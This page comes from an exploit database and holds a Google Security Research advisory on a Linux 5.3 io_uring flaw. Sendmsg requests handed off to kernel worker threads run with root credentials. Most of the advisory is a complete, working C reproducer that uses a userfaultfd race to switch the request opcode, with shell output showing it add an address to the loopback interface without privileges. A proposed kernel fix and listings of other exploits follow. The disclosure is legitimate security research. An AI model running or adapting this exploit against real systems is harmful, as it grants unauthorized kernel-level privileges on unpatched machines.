Menu

Search for hundreds of thousands of exploits

"Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds"

Author

Exploit author

"Google Security Research"

Platform

Exploit platform

linux

Release date

Exploit published date

2019-12-16

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3),
io_uring has support for asynchronously calling sendmsg().
Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
entries, which cause sendmsg() to be called either in syscall context in the
original task, or - if that wasn't able to send a message without blocking - on
a kernel worker thread.

The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:

 - sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
   datagram socket ends up performing filesystem access checks
 - sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
   process credentials
 - sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
   capability checks against the calling process

When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.

To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times, with
accesses to the struct msghdr in between: The attacker can first submit an SQE
of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and
then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG.

Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:

==========================================================================
$ cat uring_sendmsg.c 
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int uffd = -1;
static struct iovec *iov;
static struct iovec real_iov;
static struct io_uring_sqe *sqes;

static void *uffd_thread(void *dummy) {
  struct uffd_msg msg;
  int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
  if (res != sizeof(msg)) errx(1, "uffd read");
  printf("got userfaultfd message\n");

  sqes[0].opcode = IORING_OP_SENDMSG;

  union {
    struct iovec iov;
    char pad[0x1000];
  } vec = {
    .iov = real_iov
  };
  struct uffdio_copy copy = {
    .dst = (unsigned long)iov,
    .src = (unsigned long)&vec,
    .len = 0x1000
  };
  SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
  return NULL;
}

int main(void) {
  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
  sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

  // prepare userfaultfd-trapped IO vector page
  iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
  struct uffdio_register reg = {
    .mode = UFFDIO_REGISTER_MODE_MISSING,
    .range = { .start = (unsigned long)iov, .len = 0x1000 }
  };
  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
  pthread_t thread;
  if (pthread_create(&thread, NULL, uffd_thread, NULL))
    errx(1, "pthread_create");

  // construct netlink message
  int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
  struct sockaddr_nl addr = {
    .nl_family = AF_NETLINK
  };
  struct {
    struct nlmsghdr hdr;
    struct ifaddrmsg body;
    struct rtattr opthdr;
    unsigned char addr[4];
  } __attribute__((packed)) msgbuf = {
    .hdr = {
      .nlmsg_len = sizeof(msgbuf),
      .nlmsg_type = RTM_NEWADDR,
      .nlmsg_flags = NLM_F_REQUEST
    },
    .body = {
      .ifa_family = AF_INET,
      .ifa_prefixlen = 32,
      .ifa_flags = IFA_F_PERMANENT,
      .ifa_scope = 0,
      .ifa_index = 1
    },
    .opthdr = {
      .rta_len = sizeof(struct rtattr) + 4,
      .rta_type = IFA_LOCAL
    },
    .addr = { 1, 2, 3, 4 }
  };
  real_iov.iov_base = &msgbuf;
  real_iov.iov_len = sizeof(msgbuf);
  struct msghdr msg = {
    .msg_name = &addr,
    .msg_namelen = sizeof(addr),
    .msg_iov = iov,
    .msg_iovlen = 1,
  };

  // send netlink message via uring
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_RECVMSG,
    .fd = sock,
    .addr = (unsigned long)&msg
  };
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  (*(int*)(sq_ring + params.sq_off.tail))++;
  int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
  printf("submitted %d, getevents done\n", submitted);
  int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
  printf("cq_tail = %d\n", cq_tail);
  if (cq_tail != 1) errx(1, "expected cq_tail==1");
  struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
  if (cqe->res < 0) {
    printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res));
  } else {
    printf("result: %d\n", cqe->res);
  }
}
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
$ ./uring_sendmsg 
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet 1.2.3.4/32 scope global lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
$ 
==========================================================================

The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with override_creds().
(Or maybe commit_creds() - that would mean that you could actually see the
owning user of these threads in the output of something like "ps aux". On the
other hand, I'm not sure how that impacts stuff like signal sending, so
override_creds() might be safer.) It would mean that you can't safely use an
io_uring instance across something like a setuid() transition that drops
privileges, but that's probably not a big problem?

While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
it would probably be beneficial to mark such a change for backporting all the
way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
called from rw_verify_area() has so far always attributed all the I/O operations
to the kernel context, which isn't really a security problem, but might e.g.
cause unexpected denials depending on the SELinux policy.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2020-02-10 "iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()" dos multiple "Google Security Research"
2020-02-10 "usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init" dos linux "Google Security Research"
2020-01-28 "macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image" dos multiple "Google Security Research"
2020-01-14 "Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN" dos android "Google Security Research"
2020-01-14 "WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM" dos android "Google Security Research"
2019-12-18 "macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()" dos macos "Google Security Research"
2019-12-16 "Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds" local linux "Google Security Research"
2019-12-11 "Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-11-22 "Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback" dos windows "Google Security Research"
2019-11-22 "macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache" local macos "Google Security Research"
2019-11-20 "iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd" dos ios "Google Security Research"
2019-11-20 "Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Error Path" dos linux "Google Security Research"
2019-11-20 "Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs" dos linux "Google Security Research"
2019-11-11 "Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)" dos windows "Google Security Research"
2019-11-11 "Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-11-11 "iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address" dos multiple "Google Security Research"
2019-11-05 "JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects" dos multiple "Google Security Research"
2019-11-05 "WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive" dos multiple "Google Security Research"
2019-11-05 "macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()" dos macos "Google Security Research"
2019-10-30 "JavaScriptCore - GetterSetter Type Confusion During DFG Compilation" dos multiple "Google Security Research"
2019-10-28 "WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed" dos multiple "Google Security Research"
2019-10-21 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)" dos windows "Google Security Research"
2019-10-10 "Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter" dos windows "Google Security Research"
2019-10-10 "Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File" dos windows "Google Security Research"
2019-10-10 "Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File" dos windows "Google Security Research"
2019-10-10 "Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File" dos windows "Google Security Research"
2019-10-10 "Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File" dos windows "Google Security Research"
2019-10-10 "Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File" dos windows "Google Security Research"
2019-10-09 "XNU - Remote Double-Free via Data Race in IPComp Input Path" dos macos "Google Security Research"
2019-10-04 "Android - Binder Driver Use-After-Free" local android "Google Security Research"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.